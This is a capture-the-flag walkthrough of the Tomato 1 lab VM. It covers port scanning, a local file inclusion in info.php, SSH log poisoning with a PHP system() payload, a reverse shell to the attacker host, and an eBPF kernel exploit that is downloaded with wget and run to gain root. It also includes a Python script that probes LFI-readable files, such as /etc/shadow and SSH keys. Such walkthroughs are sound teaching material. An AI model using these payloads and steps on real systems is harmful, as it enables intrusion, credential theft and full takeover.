Tomato 1
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV tomato.vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-02 20:19 EST
Nmap scan report for tomato.vuln (10.0.2.85)
Host is up (0.000057s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8888/tcp open http nginx 1.10.3 (Ubuntu)
MAC Address: 08:00:27:F6:72:4A (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds
Nmap reports three open ports: 21 (vsftpd 3.0.3), 80 (Apache httpd 2.4.18) and 8888 (nginx 1.10.3). Apache 2.4.18 is the Ubuntu 16.04 package, a first hint at the distribution and kernel generation we will meet later.
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 -z file,/usr/share/dirb/wordlists/common.txt http://tomato.vuln/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://tomato.vuln/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 20 L 49 W 652 Ch "http://tomato.vuln/"
000000011: 403 9 L 28 W 276 Ch ".hta"
000000013: 403 9 L 28 W 276 Ch ".htpasswd"
000000012: 403 9 L 28 W 276 Ch ".htaccess"
000000416: 301 9 L 28 W 318 Ch "antibot_image"
000002020: 200 20 L 49 W 652 Ch "index.html"
000003588: 403 9 L 28 W 276 Ch "server-status"
Total time: 3.280437
Processed Requests: 4614
Filtered Requests: 4607
Requests/sec.: 1406.519
Fuzzing the Apache document root turns up an antibot_image directory (the 301 is the redirect to antibot_image/). Directory listing is enabled, so it can be browsed directly.
┌──(root@ghost)-[/home/ghost]
└─# curl -s http://tomato.vuln/antibot_image/antibots/info.php | grep "<\!--"
<!-- </?php include $_GET['image']; -->
Browsing the listed files and folders leads to antibot_image/antibots/info.php. Grepping its output for HTML comments reveals a commented-out include $_GET['image'], i.e. a file include driven by a GET parameter named image. The comment only gives us the parameter name; whether the live page still performs the include is what the next fuzz tests.
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 --hw=5074 -z file,/usr/share/dirb/wordlists/common.txt http://tomato.vuln/antibot_image/antibots/info.php?FUZZ=/etc/passwd
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://tomato.vuln/antibot_image/antibots/info.php?FUZZ=/etc/passwd
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001985: 200 1023 L 5115 W 86380 Ch "image"
Total time: 10.15646
Processed Requests: 4614
Filtered Requests: 4612
Requests/sec.: 454.2920
The image parameter includes /etc/passwd and the response grows to 1023 lines: a Local File Inclusion. The --hw=5074 filter hides every response whose word count matches the unmodified info.php, so only the parameter that actually changes the page is listed.
┌──(root@ghost)-[/home/ghost]
└─# python3 lfienum http://tomato.vuln/antibot_image/antibots/info.php?image= --only-url
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/passwd
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/apache2.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/crontab
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/fstab
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hosts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hosts.allow
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hosts.deny
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/issue
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/lsb-release
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/mtab
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/network/interfaces
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/networks
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/profile
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/resolv.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ssh/ssh_config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ssh/sshd_config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ssh/ssh_host_dsa_key.pub
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/vsftpd.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/cpuinfo
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/filesystems
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/interrupts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/ioports
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/meminfo
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/modules
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/mounts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/sched_debug
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/stat
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/swaps
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/version
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/net/arp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/auth.log
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/dpkg.log
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/faillog
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/lastlog
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/wtmp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/run/utmp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/adduser.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/envvars
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/autoindex.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/deflate.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/dir.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/mime.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/proxy.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/setenvif.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/ssl.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/alias.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/deflate.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/dir.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/mime.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/negotiation.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/status.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/ports.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/bash.bashrc
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ca-certificates.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/debconf.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/debian_version
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/default/grub
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/deluser.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/dhcp/dhclient.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ftpusers
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/fuse.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/group
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hdparm.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/host.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hostname
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/issue.net
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/kbd/config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/kernel-img.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ld.so.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ldap/ldap.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/login.defs
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/logrotate.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ltrace.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/manpath.config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/modules
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/nginx/nginx.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/os-release
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/pam.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/access.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/group.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/limits.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/namespace.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/pam_env.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/sepermit.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/time.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sensors3.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sysctl.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sysctl.d/10-console-messages.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sysctl.d/10-network-security.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/timezone
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/updatedb.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/devices
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/net/tcp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/net/udp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/cmdline
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/mounts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/stat
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/status
> http://tomato.vuln/antibot_image/antibots/info.php?image=/usr/share/adduser/adduser.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/nginx/access.log
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/nginx/error.log
Enumerating readable files through the LFI with lfienum; every URL above returned file content. The interesting one is /var/log/auth.log: on Ubuntu it is normally mode 0640 and owned by root/adm, so www-data cannot read it, but here it is readable, which opens the door to log poisoning.
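The enumeration step done by hand, as an added example that is not the page's lfienum tool: the point it demonstrates is that a PHP include() of a missing or unreadable file still answers HTTP 200, so a probe has to compare each body against a baseline rather than trust the status code. The candidate list, the fake responses and fake_fetch are constructed here so the script runs offline; against a live target pass fetch=http_fetch.

```python
"""Added example, not the page's lfienum tool: probe a PHP include() LFI for
readable files, judging success by comparing each response to a baseline
instead of trusting the HTTP status code. Assumptions (not from the original
page): the candidate list and the fake responses below are constructed here.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

# The vulnerable endpoint from the page; the file path is appended to it.
BASE = "http://tomato.vuln/antibot_image/antibots/info.php?image="

# Constructed: a few files worth reading through an LFI.
CANDIDATES = [
    "/etc/passwd",
    "/etc/hostname",
    "/var/log/auth.log",
    "/etc/shadow",        # normally root:shadow 0640, unreadable by www-data
    "/root/.ssh/id_rsa",  # same
]


def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Fetch used against a live target; error pages are returned as text."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def _strip_common(baseline: str, body: str) -> str:
    """Return the part of body not shared with baseline as a common prefix
    and suffix, i.e. whatever the include() itself emitted: the static page
    around the include is identical in both responses."""
    limit = min(len(baseline), len(body))
    pre = 0
    while pre < limit and baseline[pre] == body[pre]:
        pre += 1
    suf = 0
    while suf < limit - pre and baseline[-1 - suf] == body[-1 - suf]:
        suf += 1
    return body[pre:len(body) - suf]


def enumerate_lfi(base: str, paths: List[str],
                  fetch: Callable[[str], str]) -> Dict[str, str]:
    """Map each readable path to the content the include() emitted.

    include() of a missing or unreadable file still answers HTTP 200 (with a
    warning, or with nothing if display_errors is off), so status codes say
    nothing. A response is a hit only if it differs from the baseline for a
    file that cannot exist and the difference is not a PHP open() warning."""
    baseline = fetch(base + urllib.parse.quote("/nonexistent_zz_" + "x" * 8))
    found: Dict[str, str] = {}
    for path in paths:
        body = fetch(base + urllib.parse.quote(path))
        included = _strip_common(baseline, body)
        if not included.strip():
            continue
        if "failed to open stream" in included.lower():
            continue  # PHP warning for an unreadable file, not file content
        found[path] = included
    return found


# Constructed fake responses standing in for info.php so the example runs
# offline; a real run passes fetch=http_fetch instead.
_TEMPLATE = "<html><body><h1>antibots</h1>\n{}\n</body></html>\n"
_FAKE_FS = {
    "/etc/passwd": ("root:x:0:0:root:/root:/bin/bash\n"
                    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"),
    "/etc/hostname": "ubuntu\n",
    "/var/log/auth.log": ("Mar  2 20:30:01 ubuntu sshd[1001]: "
                          "Invalid user test from 10.0.2.15\n"),
}


def fake_fetch(url: str) -> str:
    """Constructed stand-in for the target: known files are returned inside
    the page template, everything else yields a PHP include() warning."""
    path = urllib.parse.unquote(url.split("image=", 1)[1])
    if path in _FAKE_FS:
        return _TEMPLATE.format(_FAKE_FS[path])
    reason = ("Permission denied" if path in ("/etc/shadow", "/root/.ssh/id_rsa")
              else "No such file or directory")
    warning = f"<b>Warning</b>: include({path}): failed to open stream: {reason}"
    return _TEMPLATE.format(warning)


if __name__ == "__main__":
    for path, content in enumerate_lfi(BASE, CANDIDATES, fake_fetch).items():
        print(f"[+] {path}: {content.splitlines()[0]}")
```

The warning check is a heuristic: a file that genuinely contains the string "failed to open stream" (an Apache error log, say) would be skipped, so when a path you expect to be readable is missing from the result, look at the raw body.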
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce http://tomato.vuln/antibot_image/antibots/info.php?image= ssh 10.0.2.15 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/auth.log
💀 Sending payload
<?php system($_GET["cmd"]); ?>@tomato.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@tomato.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@tomato.vuln's password:
<?php system($_GET["cmd"]); ?>@tomato.vuln: Permission denied (publickey,password).
listening on [any] 1337 ...
connect to [10.0.2.15] from tomato.vuln [10.0.2.85] 52974
bash: cannot set terminal process group (778): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/antibot_image/antibots$
lfi2rce first confirms that /var/log/auth.log is readable through the LFI, then poisons it: it makes SSH login attempts with the PHP payload as the user name (the three "Permission denied" prompts above are those attempts), which sshd writes into auth.log as "Invalid user <?php ... ?> from 10.0.2.15". Including the log through the LFI executes the payload, and a cmd parameter carrying a reverse shell to 10.0.2.15:1337 gives us a shell as www-data. Two caveats: the payload has to be syntactically valid PHP, because a parse error written into the log breaks every later include of that file until it rotates, and every poisoned line in the log is executed on each request, so keep the number of attempts small.
www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a && lsb_release -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
System and distribution information as the starting point for kernel exploit research: Ubuntu 16.04 on 4.4.0-21, the 16.04 GA kernel, so the box has never received a kernel update.
┌──(root@ghost)-[/home/ghost]
└─# searchsploit "Linux Kernel Ubuntu 16.04 privilege escalation"
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation | linux_x86/local/42276.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | linux/local/40489.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We are going to use Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation (linux/local/45010.c), an exploit for CVE-2017-16995, a sign-extension bug in the eBPF verifier; the running 4.4.0-21 kernel predates the fix. Several other entries in the list (the AF_PACKET and netfilter ones) also cover this kernel and would be the fallback if this one fails.
┌──(root@ghost)-[/home/ghost]
└─# gcc 45010.c -o exploit
Compile the exploit on the attacking machine. The binary is dynamically linked against our glibc, which is newer than the one on Ubuntu 16.04; if it aborts on the target with a "GLIBC_x.y not found" error, rebuild it statically (gcc -static) or compile it on the target if gcc is installed there.
www-data@ubuntu:/tmp$ wget -q http://10.0.2.15/exploit
www-data@ubuntu:/tmp$ chmod +x exploit
Serve the binary from the attacking machine on 10.0.2.15:80 (for example with python3 -m http.server 80), download it into /tmp on the target and make it executable.
www-data@ubuntu:/tmp$ ./exploit
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035dd4c00
[*] Leaking sock struct from ffff8800449bab40
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880043205840
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880043205840
[*] credentials patched, launching shell...
# cat /root/proof.txt
Sun_CSR_TEAM_TOMATO_JS_0232xx23
The exploit leaks the kernel's sock and cred structures, overwrites the credentials of the current process and launches a shell as root; /root/proof.txt holds the flag.